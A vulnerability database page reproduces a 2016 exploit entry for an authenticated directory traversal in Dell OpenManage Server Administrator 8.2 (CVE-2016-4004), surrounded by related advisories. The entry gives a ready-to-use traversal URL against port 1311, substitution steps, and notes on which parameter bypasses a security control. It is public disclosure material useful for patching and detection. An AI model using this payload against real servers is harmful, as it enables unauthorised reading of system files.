Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal

🗓️ 23 Feb 2016 00:00:00Reported by hantwisterType 
zdt
 zdt🔗 0day.today👁 25 Views

Dell OpenManage Server Administrator 8.2 Authenticated Directory Traversal, Windows 7 x6

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2016-4004
23 Feb 201600:00
circl
CNVD		Dell OpenManage Server Administrator Directory Traversal Vulnerability
14 Apr 201600:00
cnvd
CVE		CVE-2016-4004
12 Apr 201617:00
cve
Cvelist		CVE-2016-4004
12 Apr 201617:00
cvelist
Tenable Nessus		Dell OpenManage Server Administrator 8.2 ViewFile Directory Traversal
29 Jul 201600:00
nessus
NVD		CVE-2016-4004
12 Apr 201617:59
nvd
OpenVAS		Dell OpenManage Server Administrator Directory Traversal Vulnerability (Apr 2016)
27 Apr 201600:00
openvas
OSV		CVE-2016-4004
12 Apr 201617:59
osv
Packet Storm		Dell OpenManage Server Administrator 8.4 Directory Traversal
3 Apr 201700:00
packetstorm
Prion		Directory traversal
12 Apr 201617:59
prion
Rows per page
# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated
Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link:
http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64
 
When authenticated as an admin, make the following adjustments to the URL
below:
 
1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.
 
https://
<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
 
In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.
 
The path parameter should not be changed; the provided value is essential
to bypassing a security control.

#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Feb 2016 00:00Current
5.7Medium risk
Vulners AI Score5.7
EPSS0.08945
dell openmanagedirectory traversalauthenticatedwindows 7 x64security control bypass
25